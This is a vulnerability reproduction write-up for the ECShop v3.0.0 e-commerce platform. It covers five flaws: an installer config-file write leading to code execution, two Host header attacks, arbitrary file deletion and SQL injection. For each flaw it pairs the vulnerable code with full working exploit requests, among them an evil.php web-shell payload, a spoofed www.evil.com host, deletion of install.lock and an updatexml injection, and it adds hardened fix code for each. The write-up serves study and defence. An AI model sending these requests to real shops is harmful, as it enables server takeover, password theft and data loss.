ECShop v3.0.0 Vulnerability Reproduction
- Configuration file write leading to code execution
- HTTP Host header attack leading to an arbitrary redirect
- HTTP Host header attack leading to arbitrary front-end password reset
- Back-end arbitrary file deletion
- Back-end SQL injection
Configuration file write leading to code execution
In \ECShop-v3.0.0\install\index.php, the configuration values are received from a POST request and passed straight into the create_config_file method.
case 'create_config_file' :
    $db_host  = isset($_POST['db_host'])   ? trim($_POST['db_host'])   : '';
    $db_port  = isset($_POST['db_port'])   ? trim($_POST['db_port'])   : '';
    $db_user  = isset($_POST['db_user'])   ? trim($_POST['db_user'])   : '';
    $db_pass  = isset($_POST['db_pass'])   ? trim($_POST['db_pass'])   : '';
    $db_name  = isset($_POST['db_name'])   ? trim($_POST['db_name'])   : '';
    $prefix   = isset($_POST['db_prefix']) ? trim($_POST['db_prefix']) : '';
    $timezone = isset($_POST['timezone'])  ? trim($_POST['timezone'])  : 'Asia/Shanghai';
    $result = create_config_file($db_host, $db_port, $db_user, $db_pass, $db_name, $prefix, $timezone);
    if ($result === false)
Following create_config_file(), the method is found in \ECShop-3.0.0\install\includes\lib_installer.php. The key code is shown below: the supplied configuration values are written directly into the configuration file, and at no point is the POST data sanitized, so a configuration file write leading to code execution exists.
function create_config_file($db_host, $db_port, $db_user, $db_pass, $db_name, $prefix, $timezone)
{
    global $err, $_LANG;

    $db_host = construct_db_host($db_host, $db_port);

    $content = '<?' ."php\n";
    $content .= "// database host\n";
    $content .= "\$db_host = \"$db_host\";\n\n";
    $content .= "// database name\n";
    $content .= "\$db_name = \"$db_name\";\n\n";
    $content .= "// database username\n";
    $content .= "\$db_user = \"$db_user\";\n\n";
    $content .= "// database password\n";
    $content .= "\$db_pass = \"$db_pass\";\n\n";
    $content .= "// table prefix\n";
    $content .= "\$prefix = \"$prefix\";\n\n";
    $content .= "\$timezone = \"$timezone\";\n\n";
    $content .= "\$cookie_path = \"/\";\n\n";
    $content .= "\$cookie_domain = \"\";\n\n";
    $content .= "\$session = \"1440\";\n\n";
    $content .= "define('EC_CHARSET','".EC_CHARSET."');\n\n";
    $content .= "define('ADMIN_PATH','admin');\n\n";
    $content .= "define('AUTH_KEY', 'this is a key');\n\n";
    $content .= "define('OLD_AUTH_KEY', '');\n\n";
    $content .= "define('API_TIME', '');\n\n";
    $content .= "define('STORE_KEY','".md5(microtime())."');\n\n";
    $content .= '?>';

    $fp = @fopen(ROOT_PATH . 'data/config.php', 'wb+');
    if (!$fp)
    {
        $err->add($_LANG['open_config_file_failed']);
        return false;
    }
    if (!@fwrite($fp, trim($content)))
    {
        $err->add($_LANG['write_config_file_failed']);
        return false;
    }
    @fclose($fp);
    return true;
}
Reproduction:
During installation, PHP code can be written into the db_host, db_port, db_user, db_pass, db_name, db_prefix and timezone fields of the following request; db_name and timezone are used as the example below.
Sending the following request writes PHP code into the configuration file.
POST /install/index.php?step=create_config_file HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/install/index.php?lang=zh_cn&step=setting_ui&ui=
Content-Length: 324
Cookie: ECS[visit_times]=3; ECS[history]=72; PHPSESSID=uao2tc7rcn7c7lni4afpdmo2e5
Connection: close
db_host=localhost&db_port=3306&db_user=root&db_pass=root&db_name=ecshop30%22.die(fwrite(fopen(%22evil.php%22%2C%20%22w%22)%2C%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22)).%22&db_prefix=ecs_&timezone=PRC".die(fwrite(fopen(%22evil.php%22%2C%20%22w%22)%2C%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22)).%22&lang=zh_cn&IS_AJAX_REQUEST=yes
After the request succeeds, inspect the configuration file.
PHP code has been written into the db_name and timezone positions of the configuration file.
Visiting http://127.0.0.1/data/config.php, the location of the configuration file, generates the malicious file evil.php.
Visiting http://127.0.0.1/data/evil.php executes the corresponding PHP code, resulting in a web shell (GetShell).
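As an added hardening example (not ECShop's own code), the same configuration file is produced with every value validated against a narrow syntax and then emitted through var_export(), so a db_name such as the payload above cannot close the string literal and run code; the field rules and the host:port joining are assumptions.

```php
<?php
// Added example, not ECShop's code: a hardened way to build data/config.php.
// Values are validated against a narrow syntax, then emitted with var_export(),
// which produces a quoted PHP literal with quotes and backslashes escaped, so a
// db_name like  ecshop30".die(...)."  cannot close the string and run code.
// The field rules and the host:port joining are assumptions, not ECShop behaviour.
function validate_config_input(array $in): array
{
    // Fields with a fixed syntax are rejected early if they do not match it.
    $rules = [
        'db_host'   => '/^[A-Za-z0-9.\-]{1,253}$/',
        'db_port'   => '/^[0-9]{1,5}$/',
        'db_user'   => '/^[A-Za-z0-9_.\-]{1,64}$/',
        'db_name'   => '/^[A-Za-z0-9_\-]{1,64}$/',
        'db_prefix' => '/^[A-Za-z0-9_]{0,32}$/',
    ];
    $out = [];
    foreach ($rules as $key => $re) {
        $val = isset($in[$key]) ? trim((string) $in[$key]) : '';
        if (!preg_match($re, $val)) {
            throw new InvalidArgumentException("invalid value for $key");
        }
        $out[$key] = $val;
    }
    // The password may contain any character; it is escaped below, never interpolated.
    $out['db_pass'] = isset($in['db_pass']) ? (string) $in['db_pass'] : '';
    $tz = isset($in['timezone']) ? trim((string) $in['timezone']) : 'Asia/Shanghai';
    if (!in_array($tz, DateTimeZone::listIdentifiers(), true)) {
        throw new InvalidArgumentException('unknown timezone');
    }
    $out['timezone'] = $tz;
    return $out;
}
function build_config_source(array $cfg): string
{
    $vars = [
        'db_host'  => $cfg['db_host'] . ':' . $cfg['db_port'],
        'db_name'  => $cfg['db_name'],
        'db_user'  => $cfg['db_user'],
        'db_pass'  => $cfg['db_pass'],
        'prefix'   => $cfg['db_prefix'],
        'timezone' => $cfg['timezone'],
    ];
    $lines = ['<?php'];
    foreach ($vars as $name => $value) {
        // var_export() does the quoting; the value stays data, never PHP syntax.
        $lines[] = '$' . $name . ' = ' . var_export($value, true) . ';';
    }
    return implode("\n", $lines) . "\n";
}

// Constructed sample input reusing the db_name payload from the write-up.
$sample = ['db_host' => 'localhost', 'db_port' => '3306', 'db_user' => 'root', 'db_pass' => 'root',
           'db_name' => 'ecshop30".die(phpinfo())."', 'db_prefix' => 'ecs_', 'timezone' => 'Asia/Shanghai'];
try {
    echo build_config_source(validate_config_input($sample));
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Even if the regex layer were removed, var_export() alone would keep the payload inside a single-quoted literal; the two layers are independent defences.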
HTTP Host header attack leading to an arbitrary redirect
In \ECShop-3.0.0\install\index.php, the concatenated URL is passed to the header function, which performs the redirect.
case 'done' :
    $result = deal_aftermath();
    clear_all_files();
    if ($_SERVER['HTTP_HOST'] != 'localhost' && $_REQUEST['type'] == 'yunqi')
    {
        $url = url()."/yunqi_check.php?act=yunqi_check";
        header("Location: ".$url);
        exit;
    }
    else
    {
        if ($result === false)
        {
            $err_msg = implode(',', $err->get_all());
            $smarty->assign('err_msg', $err_msg);
            $smarty->display('error.php');
        }
Following the url method, it is found in \ECShop-3.0.0\install\includes\lib_installer.php. It reads the host name from $_SERVER['HTTP_HOST'], concatenates it into the URL and returns the result to the call site, so an HTTP Host header attack leading to an arbitrary redirect exists.
function url()
{
    $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
    $ecserver = 'http://'.$_SERVER['HTTP_HOST'].($_SERVER['SERVER_PORT'] && $_SERVER['SERVER_PORT'] != 80 ? ':'.$_SERVER['SERVER_PORT'] : '');
    $default_appurl = $ecserver.substr($PHP_SELF, 0, strpos($PHP_SELF, 'install/') - 1);
    return $default_appurl;
}
Reproduction:
Sending the following request returns a 302 redirect to the www.evil.com site.
GET /install/index.php?lang=zh_cn&step=done&type=yunqi HTTP/1.1
Host: www.evil.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/install/index.php?lang=zh_cn&step=setting_ui&ui=
Connection: close
Upgrade-Insecure-Requests: 1
HTTP Host header attack leading to arbitrary front-end password reset
In \ECShop3.0.0\user.php, when a password reset is requested by email, the send_pwd_email method is called.
/* Send the password change confirmation email */
elseif ($action == 'send_pwd_email')
{
    include_once(ROOT_PATH . 'includes/lib_passport.php');

    /* Initialize the member username and email address */
    $user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
    $email = !empty($_POST['email']) ? trim($_POST['email']) : '';

    // Do the username and email address match?
    $user_info = $user->get_user_info($user_name);
    if ($user_info && $user_info['email'] == $email)
    {
        // Generate the code
        //$code = md5($user_info[0] . $user_info[1]);
        $code = md5($user_info['user_id'] . $_CFG['hash_code'] . $user_info['reg_time']);

        // Function that sends the email
        if (send_pwd_email($user_info['user_id'], $user_name, $email, $code))
        {
            show_message($_LANG['send_success'] . $email, $_LANG['back_home_lnk'], './', 'info');
        }
        else
        {
            // Error while sending the email
            show_message($_LANG['fail_send_password'], $_LANG['back_page_up'], './', 'info');
        }
    }
    else
    {
        // Username and email address do not match
        show_message($_LANG['username_no_email'], $_LANG['back_page_up'], '', 'info');
    }
}
Following send_pwd_email into \ECShop-3.0.0\includes\lib_passport.php, the url method is used while the email body is assembled; the assembled result is content, which is then passed to the send_mail method.
    /* Set up the content needed by the reset email template */
    $template = get_mail_template('send_password');
    $reset_email = $GLOBALS['ecs']->url() . 'user.php?act=get_password&uid=' . $uid . '&code=' . $code;
    $GLOBALS['smarty']->assign('user_name', $user_name);
    $GLOBALS['smarty']->assign('reset_email', $reset_email);
    $GLOBALS['smarty']->assign('shop_name', $GLOBALS['_CFG']['shop_name']);
    $GLOBALS['smarty']->assign('send_date', date('Y-m-d'));
    $GLOBALS['smarty']->assign('sent_date', date('Y-m-d'));
    $content = $GLOBALS['smarty']->fetch('str:' . $template['template_content']);

    /* Send the confirmation email for the password reset */
    if (send_mail($user_name, $email, $template['template_subject'], $content, $template['is_html']))
    {
        return true;
    }
    else
    {
        return false;
    }
}
Following the url method, it is found in \ECShop3.0.0\includes\cls_ecshop.php; its return statement calls the get_domain method.
function url()
{
    $curr = strpos(PHP_SELF, ADMIN_PATH . '/') !== false ?
        preg_replace('/(.*)(' . ADMIN_PATH . ')(\/?)(.)*/i', '\1', dirname(PHP_SELF)) :
        dirname(PHP_SELF);
    $root = str_replace('\\', '/', $curr);

    if (substr($root, -1) != '/')
    {
        $root .= '/';
    }

    return $this->get_domain() . $root;
}
Following get_domain, it is found in the same file, \ECShop3.0.0\includes\cls_ecshop.php. It uses $_SERVER['HTTP_X_FORWARDED_HOST'] and $_SERVER['HTTP_HOST'] to obtain the host name or IP address, both of which are user-controlled inputs. Throughout the email-sending process, therefore, the body can be forged by changing the Host of the HTTP request.
function get_domain()
{
    /* Protocol */
    $protocol = $this->http();

    /* Domain name or IP address */
    if (isset($_SERVER['HTTP_X_FORWARDED_HOST']))
    {
        $host = $_SERVER['HTTP_X_FORWARDED_HOST'];
    }
    elseif (isset($_SERVER['HTTP_HOST']))
    {
        $host = $_SERVER['HTTP_HOST'];
    }
    else
    {
        /* Port */
        if (isset($_SERVER['SERVER_PORT']))
        {
            $port = ':' . $_SERVER['SERVER_PORT'];

            if ((':80' == $port && 'http://' == $protocol) || (':443' == $port && 'https://' == $protocol))
            {
                $port = '';
            }
        }
        else
        {
            $port = '';
        }

        if (isset($_SERVER['SERVER_NAME']))
        {
            $host = $_SERVER['SERVER_NAME'] . $port;
        }
        elseif (isset($_SERVER['SERVER_ADDR']))
        {
            $host = $_SERVER['SERVER_ADDR'] . $port;
        }
    }

    return $protocol . $host;
}
Reproduction:
Knowing the username and the registered email address, the following request can be used to send a password reset link.
POST /user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
Referer: http://127.0.0.1/user.php?act=get_password
Cookie: ECS[visit_times]=2; ECS_ID=500ac5868ca2faceb1b34797cd8f7bebf6ed1009
client-ip: 127.0.0.2
X-Forwarded-For: 127.0.0.3
Connection: close
Upgrade-Insecure-Requests: 1
user_name=Thinking&email=thinking_balabala%40163.com&act=send_pwd_email&submit=%E6%8F%90+%E4%BA%A4
The victim then receives an email like the following; clicking the reset link in the email sends the password reset key to the attacker's server.
Once the attacker has the reset code, the password can be reset.
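Both Host header issues on this page, the installer's url() redirect and the get_domain() used for the reset link, share one root cause: the origin of a server-generated URL is taken from request headers. The added example below (not ECShop's code) builds those URLs from a configured canonical host instead, honouring the request's Host only when it is on an allowlist and ignoring X-Forwarded-Host; the class, function and host names are assumptions.

```php
<?php
// Added example, not ECShop's code: a replacement for get_domain()/url() that
// never derives the origin of a generated link or redirect from the request's
// Host or X-Forwarded-Host headers. The canonical host is configured, and the
// request host is only honoured when it appears in an allowlist.
class SafeDomain
{
    private $allowed;    // hosts this installation legitimately answers for
    private $canonical;  // host written into links when the request host is not allowed

    public function __construct(string $canonical, array $allowed)
    {
        $this->canonical = strtolower($canonical);
        $this->allowed   = array_map('strtolower', $allowed);
    }

    // X-Forwarded-Host is deliberately ignored: any client can set it unless a
    // trusted proxy strips it, and ECShop's get_domain() consulted it first.
    public function request_host(array $server): string
    {
        $host = isset($server['HTTP_HOST']) ? strtolower($server['HTTP_HOST']) : '';
        // Compare without any :port suffix (IPv6 literals are not handled here).
        $bare = preg_replace('/:[0-9]+$/', '', $host);
        return in_array($bare, $this->allowed, true) ? $host : $this->canonical;
    }

    public function get_domain(array $server): string
    {
        $https = !empty($server['HTTPS']) && $server['HTTPS'] !== 'off';
        return ($https ? 'https://' : 'http://') . $this->request_host($server);
    }
}

// Both call sites from the write-up, rebuilt on top of SafeDomain:
// the installer's yunqi redirect and the password-reset link.
function redirect_url(SafeDomain $d, array $server): string
{
    return $d->get_domain($server) . '/yunqi_check.php?act=yunqi_check';
}

function reset_link(SafeDomain $d, array $server, int $uid, string $code): string
{
    return $d->get_domain($server) . '/user.php?act=get_password&uid=' . $uid
        . '&code=' . rawurlencode($code);
}

// Constructed sample: the spoofed Host from the write-up sent to a shop that
// only answers for shop.example.com and localhost (hypothetical names).
$d = new SafeDomain('shop.example.com', ['shop.example.com', 'localhost']);
$spoofed = ['HTTP_HOST' => 'www.evil.com', 'HTTP_X_FORWARDED_HOST' => 'www.evil.com'];
echo redirect_url($d, $spoofed), "\n";
echo reset_link($d, $spoofed, 7, 'constructed-code'), "\n";
echo reset_link($d, ['HTTP_HOST' => 'localhost'], 7, 'constructed-code'), "\n";
```

The allowlist check is what also removes the installer's `$_SERVER['HTTP_HOST'] != 'localhost'` special case, since an unknown host never reaches the redirect with its own name.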
Back-end arbitrary file deletion
In the following code block of \ECShop3.0.0\admin\article.php, the value of the file_url parameter is received via POST and then inserted into the article table of the database.
/* Determine how the article is opened */
if ($file_url == '')
{
    $open_type = 0;
}
else
{
    $open_type = $_POST['FCKeditor1'] == '' ? 1 : 2;
}

/* Insert data */
$add_time = gmtime();
if (empty($_POST['cat_id']))
{
    $_POST['cat_id'] = 0;
}
$sql = "INSERT INTO ".$ecs->table('article')."(title, cat_id, article_type, is_open, author, ".
       "author_email, keywords, content, add_time, file_url, open_type, link, description) ".
       "VALUES ('$_POST[title]', '$_POST[article_cat]', '$_POST[article_type]', '$_POST[is_open]', ".
       "'$_POST[author]', '$_POST[author_email]', '$_POST[keywords]', '$_POST[FCKeditor1]', ".
       "'$add_time', '$file_url', '$open_type', '$_POST[link_url]', '$_POST[description]')";
$db->query($sql);
Then, in the following code in the same file, file_url is read back from the article table and the file is deleted with unlink. Nothing in this process sanitizes the file name, so an arbitrary file deletion vulnerability exists.
elseif ($_REQUEST['act'] == 'remove')
{
    check_authz_json('article_manage');

    $id = intval($_GET['id']);

    /* Delete the original file */
    $sql = "SELECT file_url FROM " . $ecs->table('article') . " WHERE article_id = '$id'";
    $old_url = $db->getOne($sql);
    if ($old_url != '' && strpos($old_url, 'http://') === false && strpos($old_url, 'https://') === false)
    {
        @unlink(ROOT_PATH . $old_url);
    }
Reproduction:
First put the path of the file to delete in the file_url parameter and send the following request, which inserts a row carrying the target file path into the article table of the database.
POST /admin/article.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1873
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryab9PkzCWZGRw6awU
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://127.0.0.1/admin/article.php?act=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: loginNum=3; ECS_LastCheckOrder=Tue%2C%2023%20Jan%202018%2002%3A55%3A15%20GMT; Toggle_State_1={},Wed, 24 Jan 2018 06:42:48 GMT; ECSCP[lastfilterfile]=23A0E66; ECSCP[lastfilter]=a%253A9%253A%257Bs%253A7%253A%2522keyword%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522cat_id%2522%253Bi%253A0%253Bs%253A7%253A%2522sort_by%2522%253Bs%253A12%253A%2522a.article_id%2522%253Bs%253A10%253A%2522sort_order%2522%253Bs%253A4%253A%2522DESC%2522%253Bs%253A12%253A%2522record_count%2522%253Bs%253A2%253A%252235%2522%253Bs%253A9%253A%2522page_size%2522%253Bi%253A15%253Bs%253A4%253A%2522page%2522%253Bi%253A1%253Bs%253A10%253A%2522page_count%2522%253Bd%253A3%253Bs%253A5%253A%2522start%2522%253Bi%253A0%253B%257D; ECSCP[lastfiltersql]=U0VMRUNUIGEuKiAsIGFjLmNhdF9uYW1lIEZST00gYGVjc2hvcDMwYC5gZWNzX2FydGljbGVgIEFTIGEgTEVGVCBKT0lOIGBlY3Nob3AzMGAuYGVjc19hcnRpY2xlX2NhdGAgQVMgYWMgT04gYWMuY2F0X2lkID0gYS5jYXRfaWQgV0hFUkUgMSAgT1JERVIgYnkgYS5hcnRpY2xlX2lkIERFU0M%3D; security_level=1; __guid=96992031.2794073907059157500.1501489482338.276; sYQDUGqqzHsearch_history=a%7C1; a9617_times=1; bdshare_firstime=1510970163771; ECS_ID=54f1ee86ca058e2980cef4a2a937ba2697eb82ea; ECS[visit_times]=1; ECSCP_ID=0c82abaa20ce2ecacb164e5218eaccbc3e3ce52f; monitor_count=9
Connection: close
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="title"
balabala1
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="article_cat"
2
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="article_type"
0
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="is_open"
1
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="author"
thinking
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="author_email"
thinking@qq.com
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="keywords"
1
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="description"
1
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="link_url"
http://host.2tzion.ceye.io
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="file"; filename=""
Content-Type: image/png
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="file_url"
data/install.lock
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="FCKeditor1"
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="cat_id"
0
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="brand_id"
0
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="keyword"
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="act"
insert
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="old_title"
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryab9PkzCWZGRw6awU--
Then send the following request to delete the article with the corresponding id; as part of the deletion, the file recorded in the previous request is unlinked.
GET /admin/article.php?is_ajax=1&act=remove&id=39&keyword=&cat_id=0&sort_by=a.article_id&sort_order=DESC&record_count=36&page_size=15&page=1&page_count=3&start=0&1516676396253253 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: */*
Referer: http://127.0.0.1/admin/article.php?act=list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: loginNum=3; Toggle_State_1={},Wed, 24 Jan 2018 06:42:48 GMT; ECS_LastCheckOrder=Tue%2C%2023%20Jan%202018%2002%3A58%3A47%20GMT; ECSCP[lastfilterfile]=23A0E66; ECSCP[lastfilter]=a%253A9%253A%257Bs%253A7%253A%2522keyword%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522cat_id%2522%253Bi%253A0%253Bs%253A7%253A%2522sort_by%2522%253Bs%253A12%253A%2522a.article_id%2522%253Bs%253A10%253A%2522sort_order%2522%253Bs%253A4%253A%2522DESC%2522%253Bs%253A12%253A%2522record_count%2522%253Bs%253A2%253A%252236%2522%253Bs%253A9%253A%2522page_size%2522%253Bi%253A15%253Bs%253A4%253A%2522page%2522%253Bi%253A1%253Bs%253A10%253A%2522page_count%2522%253Bd%253A3%253Bs%253A5%253A%2522start%2522%253Bi%253A0%253B%257D; ECSCP[lastfiltersql]=U0VMRUNUIGEuKiAsIGFjLmNhdF9uYW1lIEZST00gYGVjc2hvcDMwYC5gZWNzX2FydGljbGVgIEFTIGEgTEVGVCBKT0lOIGBlY3Nob3AzMGAuYGVjc19hcnRpY2xlX2NhdGAgQVMgYWMgT04gYWMuY2F0X2lkID0gYS5jYXRfaWQgV0hFUkUgMSAgT1JERVIgYnkgYS5hcnRpY2xlX2lkIERFU0M%3D; security_level=1; __guid=96992031.2794073907059157500.1501489482338.276; sYQDUGqqzHsearch_history=a%7C1; a9617_times=1; bdshare_firstime=1510970163771; ECS_ID=54f1ee86ca058e2980cef4a2a937ba2697eb82ea; ECS[visit_times]=1; ECSCP_ID=0c82abaa20ce2ecacb164e5218eaccbc3e3ce52f; monitor_count=10
Connection: close
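The fix for the remove action is to treat file_url as an untrusted path and confine deletion to the upload directory. The added example below (not ECShop's code) resolves the stored path with realpath() and refuses anything outside the upload root; ROOT_PATH handling and the data/article/ subdirectory are assumptions about the layout.

```php
<?php
// Added example, not ECShop's code: the unlink() step of the article "remove"
// action rewritten so that only a regular file inside the article upload
// directory can be deleted. The original only rejects http:// and https://
// values; this resolves the stored path and requires it to stay under the
// upload root. ROOT_PATH layout and the 'data/article/' subdirectory are assumptions.
function resolve_deletable(string $root, string $upload_dir, string $file_url)
{
    if ($file_url === '' || strpos($file_url, "\0") !== false) {
        return null;
    }
    $base = realpath($root . $upload_dir);
    $path = realpath($root . $file_url);
    // realpath() is false for missing files and dangling links; both are rejected.
    if ($base === false || $path === false) {
        return null;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // Containment check on the resolved path: defeats ../ traversal and symlinks
    // that point outside the upload directory.
    if (strncmp($path, $base, strlen($base)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

function safe_remove_article_file(string $root, string $file_url): bool
{
    $target = resolve_deletable($root, 'data/article/', $file_url);
    if ($target === null) {
        return false;   // refused: outside the upload dir, missing, or not a regular file
    }
    return unlink($target);
}

// Constructed demo in a temporary tree: one legitimate attachment plus the
// data/install.lock file targeted by the request in the write-up.
$root = sys_get_temp_dir() . '/ecshop_demo_' . getmypid() . '/';
mkdir($root . 'data/article', 0700, true);
file_put_contents($root . 'data/article/a.png', 'x');
file_put_contents($root . 'data/install.lock', 'x');
var_dump(safe_remove_article_file($root, 'data/install.lock'));            // lock file, outside upload dir
var_dump(safe_remove_article_file($root, 'data/article/../install.lock')); // traversal attempt
var_dump(safe_remove_article_file($root, 'data/article/a.png'));           // legitimate attachment
var_dump(file_exists($root . 'data/install.lock'));                        // lock file must survive
```

The same containment check belongs at insert time as well, so that a file_url pointing outside the upload directory is never stored in the article table in the first place.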
Back-end SQL injection
In /admin/shophelp.php, $_POST['id'] is concatenated directly into the SQL statement without any sanitization or filtering, leading to a SQL injection vulnerability.
if ($_REQUEST['act'] == 'update')
{
    /* Permission check */
    admin_priv('shophelp_manage');

    /* Check for a duplicate name */
    if ($_POST['title'] != $_POST['old_title'] )
    {
        $exc_article->is_only('title', $_POST['title'], $_LANG['articlename_exist'], $_POST['id']);
    }

    /* Update */
    if ($exc_article->edit("title = '$_POST[title]', cat_id = '$_POST[cat_id]', article_type = '$_POST[article_type]', content = '$_POST[FCKeditor1]'", $_POST['id']))
    {
        /* Clear the cache */
        clear_cache_files();

        $link[0]['text'] = $_LANG['back_list'];
        $link[0]['href'] = 'shophelp.php?act=list_article&cat_id='.$_POST['cat_id'];
        sys_msg(sprintf($_LANG['articleedit_succeed'], $_POST['title']), 0, $link);
        admin_log($_POST['title'], 'edit', 'shophelp');
    }
}
The $_POST['id'] in the duplicate-name check is a numeric injection point that can be used to retrieve sensitive information from the database.
$exc_article->is_only('title', $_POST['title'], $_LANG['articlename_exist'], $_POST['id']);
Reproduction:
Error-based injection can be used to read database data; for example, the following payload retrieves information from the database.
POST /code/ECShop30/admin/shophelp.php?act=update HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Cookie: ECSCP_ID=328cb50e35929abc119899c12b9a46495ca49fcf
Connection: close
Upgrade-Insecure-Requests: 1
title=aaa&old_title=bbb&cat_id=2&article_type=1&FCKeditor1=ccc&id=updatexml(0,(concat(0x7e,(select user()),0x7e)),0)
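The duplicate-title check above is the injection point; the added example below (not ECShop's code) shows the same check with the id coerced to an integer and the query run as a prepared statement, demonstrated against an in-memory SQLite table named after ECShop's ecs_ prefix (the table layout and PDO handle are assumptions).

```php
<?php
// Added example, not ECShop's code: the duplicate-title check from the
// shophelp.php update action rewritten so that the id is coerced to an integer
// and the query is a prepared statement rather than string concatenation.
// Assumptions: a PDO handle and a table named ecs_article with columns
// article_id and title (ECShop's default prefix is ecs_; column names follow
// the INSERT shown in the article.php section).
function is_title_taken(PDO $db, string $title, $id): bool
{
    // Numeric field: intval() reduces "updatexml(0,...)" to 0 before it reaches SQL.
    $id = intval($id);
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM ecs_article WHERE title = :title AND article_id <> :id'
    );
    // Bound parameters travel as data; a title containing quotes is harmless.
    $stmt->bindValue(':title', $title, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return (int) $stmt->fetchColumn() > 0;
}

// Constructed demo on an in-memory SQLite database (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ecs_article (article_id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO ecs_article (article_id, title) VALUES (1, 'aaa'), (2, 'bbb')");

// The id value from the payload request above: it is treated as the number 0,
// so the check simply asks whether another row already uses the title.
$payload_id = 'updatexml(0,(concat(0x7e,(select user()),0x7e)),0)';
var_dump(is_title_taken($db, 'aaa', $payload_id));   // another row (id 1) has this title
var_dump(is_title_taken($db, 'aaa', 1));             // id 1 is the row being edited itself
var_dump(is_title_taken($db, "a'aa", 2));            // quote in the title cannot break the query
```

The edit() call in the same block interpolates $_POST values the same way, so the intval() and bound parameters must be applied to the UPDATE as well, not only to the duplicate check.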